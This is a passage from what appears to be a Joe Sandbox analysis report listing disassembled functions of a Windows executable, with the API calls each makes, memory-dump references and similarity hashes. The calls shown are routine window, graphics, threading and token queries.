                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: bd564b4648ffa539c5c483ec53d137bb90801784bf3b2801ec5dff8dbd3b8131
                          • Instruction ID: 7a442edd7f49fed584c0b85f308638e8389844b5bfb85ae40c384d88130f153a
                          • Opcode Fuzzy Hash: bd564b4648ffa539c5c483ec53d137bb90801784bf3b2801ec5dff8dbd3b8131
                          • Instruction Fuzzy Hash: 8621F6722042147AEB15AB69EC49E7B7BE9EF45750F2080ABF809DA1E1EE71DC409760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6DCC0
                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B6DCE4
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B6DCFC
                          • GetSystemMetrics.USER32(00000004), ref: 00B6DD24
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00B5407D,00000000), ref: 00B6DD42
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Long$MetricsSystem
                          • String ID:
                          • API String ID: 2294984445-0
                          • Opcode ID: 48d0189437fef5c72a5f67b7c54ba5c5978154d532883bce3f7e05d88e1410b0
                          • Instruction ID: fcb47efb7b5597cb1896c366a66134c69c26af844eb29ccc2c2cc5e19ea3ace0
                          • Opcode Fuzzy Hash: 48d0189437fef5c72a5f67b7c54ba5c5978154d532883bce3f7e05d88e1410b0
                          • Instruction Fuzzy Hash: 1621B071B04215AFCB206F788C88B6937E4FB46364B150B75F926D72E0D7749810CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B3CA86
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B3CAB8
                          • __itow.LIBCMT ref: 00B3CAD0
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B3CAF6
                          • __itow.LIBCMT ref: 00B3CB07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$__itow$_memmove
                          • String ID:
                          • API String ID: 2983881199-0
                          • Opcode ID: a49f08dc782b11c12314278c3bf68ccf73ef40bdb10ab7a1f4337a95ff67c6c5
                          • Instruction ID: f18eeff555850e9ff0c3abd43727260b188a6396633d2c08b4fa63f2345c9538
                          • Opcode Fuzzy Hash: a49f08dc782b11c12314278c3bf68ccf73ef40bdb10ab7a1f4337a95ff67c6c5
                          • Instruction Fuzzy Hash: 9821C976B006187BDB21EAA4DC47EDEBFE9DF49750F2040A5F905F7191EA708D0583A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B589AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00B589CE
                          • GetForegroundWindow.USER32 ref: 00B589E5
                          • GetDC.USER32(00000000), ref: 00B58A21
                          • GetPixel.GDI32(00000000,?,00000003), ref: 00B58A2D
                          • ReleaseDC.USER32(00000000,00000003), ref: 00B58A68
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: 84e2d743cacad0c90aa053cf137b66cb66bed6dcd5dc0efe7548b01c5c1e9e86
                          • Instruction ID: ee318afd4aa782c152c1e1a7a5e84e6d5fa41b7b958ba6f144d20cfb94ba4357
                          • Opcode Fuzzy Hash: 84e2d743cacad0c90aa053cf137b66cb66bed6dcd5dc0efe7548b01c5c1e9e86
                          • Instruction Fuzzy Hash: 15216375A00204AFDB00EF65CC89BAA7BF5EF48301F0484B9E949A73A1DF70AD45CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1B5EB
                          • SelectObject.GDI32(?,00000000), ref: 00B1B5FA
                          • BeginPath.GDI32(?), ref: 00B1B611
                          • SelectObject.GDI32(?,00000000), ref: 00B1B63B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 33a118d13b7c7a17d678f90d45444c0f32fb87fb40e171498d388d463e7a553d
                          • Instruction ID: a23383c397f86dd9e4371e8188e68d4582510c1830c980423b1bfa666bbfedc1
                          • Opcode Fuzzy Hash: 33a118d13b7c7a17d678f90d45444c0f32fb87fb40e171498d388d463e7a553d
                          • Instruction Fuzzy Hash: CB218070804305EBDB10AF19DD88FE97BE9FB2A355F544556F455A31E1CB7088D1CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B22E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                          Download Yara Rule
                          APIs
                          • __calloc_crt.LIBCMT ref: 00B22E81
                          • CreateThread.KERNEL32(?,?,00B22FB7,00000000,?,?), ref: 00B22EC5
                          • GetLastError.KERNEL32 ref: 00B22ECF
                          • _free.LIBCMT ref: 00B22ED8
                          • __dosmaperr.LIBCMT ref: 00B22EE3
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                          • String ID:
                          • API String ID: 2664167353-0
                          • Opcode ID: fc4a6b284e8eac508b067f5df42805fbbe8329df1ca07a70bc9bc6c5fe1e2208
                          • Instruction ID: 5be6f5912a50707497124bad0fcc4fcd7439bcfd8cccaf0fed9da20128e63f21
                          • Opcode Fuzzy Hash: fc4a6b284e8eac508b067f5df42805fbbe8329df1ca07a70bc9bc6c5fe1e2208
                          • Instruction Fuzzy Hash: 8C11E132105326BF9721BFA5BC42DAB3BE8EF04770B1104A9F91CC61A1EF31D80197A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
                          • GetLastError.KERNEL32(?,00B3B3CB,?,?,?), ref: 00B3B90D
                          • GetProcessHeap.KERNEL32(00000008,?,?,00B3B3CB,?,?,?), ref: 00B3B91C
                          • RtlAllocateHeap.NTDLL(00000000,?,00B3B3CB), ref: 00B3B923
                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B3B93A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 883493501-0
                          • Opcode ID: c81a9a9ced46c985cb3ce41be66ee2f87f46d0fdce3692f6f07d221c398bdebf
                          • Instruction ID: b3e269f71f3cc4e89dd5f2d1a1523de62eb75d43216f3a6c0c83df5d29a9ba41
                          • Opcode Fuzzy Hash: c81a9a9ced46c985cb3ce41be66ee2f87f46d0fdce3692f6f07d221c398bdebf
                          • Instruction Fuzzy Hash: 6A013171241208BFDF159FA5DC88E6B3BADEF8A764B20056AF645D31A0DB71DC40DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B48355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B48371
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B4837F
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B48387
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B48391
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B483CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 86d2686d99b7e1f6533d701c4196014aff6fc24b2e33547d12dd019c9b123f88
                          • Instruction ID: ffa1076109f4be7545b48aef0de16cca7424a7243b19737c771c9ebf9c40d0f0
                          • Opcode Fuzzy Hash: 86d2686d99b7e1f6533d701c4196014aff6fc24b2e33547d12dd019c9b123f88
                          • Instruction Fuzzy Hash: F9011731D00619DBCF00AFA8E988AEEBBB8FF08B01F000496E541B3190DF749A50E7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B3B7A5
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B3B7AF
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B3B7BE
                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00B3B7C5
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B3B7DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 7dcc5708fc1675f1a350713a24392525892c434a9e93200e196877dbe6d62aa7
                          • Instruction ID: c8cab40f1fd23318f12779664c663e4e3cbb1fd0bb2a2e563e7b4c2901315839
                          • Opcode Fuzzy Hash: 7dcc5708fc1675f1a350713a24392525892c434a9e93200e196877dbe6d62aa7
                          • Instruction Fuzzy Hash: 5CF06271240304AFEB101FA9EC89E673BECFF86755F20405AFA41D71A0DB619C41CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B3B806
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B3B810
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3B81F
                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00B3B826
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3B83C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: d14586fa0ca475f9c49d650f7080b2a880bc94f0dc3d042ba5476e41f1a93b1a
                          • Instruction ID: ebb33046bc2189c8366ec2c70d47d4a06758122af2d523b087a315b425ec3d70
                          • Opcode Fuzzy Hash: d14586fa0ca475f9c49d650f7080b2a880bc94f0dc3d042ba5476e41f1a93b1a
                          • Instruction Fuzzy Hash: 65F06275240304AFEB211FA5EC88E673BACFF46764F20006AFA41D71A0DB619C42CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00B3FA8F
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B3FAA6
                          • MessageBeep.USER32(00000000), ref: 00B3FABE
                          • KillTimer.USER32(?,0000040A), ref: 00B3FADA
                          • EndDialog.USER32(?,00000001), ref: 00B3FAF4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 3e1261fc1589a9a4e8ed8dc7186c57fcaffc771616a6f0b2712e1729122a4ade
                          • Instruction ID: 6bfcc536bc5f14859276b955b8bf08a5633e197df151dd052627175b5b9d03fa
                          • Opcode Fuzzy Hash: 3e1261fc1589a9a4e8ed8dc7186c57fcaffc771616a6f0b2712e1729122a4ade
                          • Instruction Fuzzy Hash: B7018630900705ABEB20AB10DD4EBE677F8FB10B05F1401AAB547A50F0DFF0A944CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • EndPath.GDI32(?), ref: 00B1B526
                          • StrokeAndFillPath.GDI32(?,?,00B7F583,00000000,?), ref: 00B1B542
                          • SelectObject.GDI32(?,00000000), ref: 00B1B555
                          • DeleteObject.GDI32 ref: 00B1B568
                          • StrokePath.GDI32(?), ref: 00B1B583
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 09d92665266a9e60cd3dfbb759aa33c487181e23779a0e7cb54f7c36be454be3
                          • Instruction ID: deb2c5d33a34c3c6f4401c4ae0b32ee9aa2ecbd50661c8b0b4e7a559a8089713
                          • Opcode Fuzzy Hash: 09d92665266a9e60cd3dfbb759aa33c487181e23779a0e7cb54f7c36be454be3
                          • Instruction Fuzzy Hash: D3F03C30008204EBCB156F29EC2CF943FE2FB16322F548655E4A5A60F1CB3089E5DF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B23EED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 00B23F7D
                            • Part of subcall function 00B2EE80: __87except.LIBCMT ref: 00B2EEBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorHandling__87except__start
                          • String ID: pow
                          • API String ID: 2905807303-2276729525
                          • Opcode ID: 9c088a8e333c752b9d39560907a8ee3d6edce1b4bb95f10616a057816a9704d2
                          • Instruction ID: a9415cdc574847da11e13432c2cc95f42c0f015b9aeca934f79c174ce54c14fb
                          • Opcode Fuzzy Hash: 9c088a8e333c752b9d39560907a8ee3d6edce1b4bb95f10616a057816a9704d2
                          • Instruction Fuzzy Hash: 36512B21D0822296D715BB18FB5137B6BF4DB40B10F208DE9E4AD461A9EF39CDC89A46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$+
                          • API String ID: 0-2552117581
                          • Opcode ID: 1db3f33638d78785c6c97e0cc688b4c645caa082c40b125c0b24e088b949b1e4
                          • Instruction ID: eeed27ebed9575fada1b206465ce0efb315f82daa4795ea75511e3cf5448de1a
                          • Opcode Fuzzy Hash: 1db3f33638d78785c6c97e0cc688b4c645caa082c40b125c0b24e088b949b1e4
                          • Instruction Fuzzy Hash: 3A512035108256CFDF21EF68C494AFA7BE0EF26311F548095F8A69B2E1D7749C92CB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B9DC40,?,0000000F,0000000C,00000016,00B9DC40,?), ref: 00B4507B
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B0B8A7: _memmove.LIBCMT ref: 00B0B8FB
                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00B450FB
                          Strings
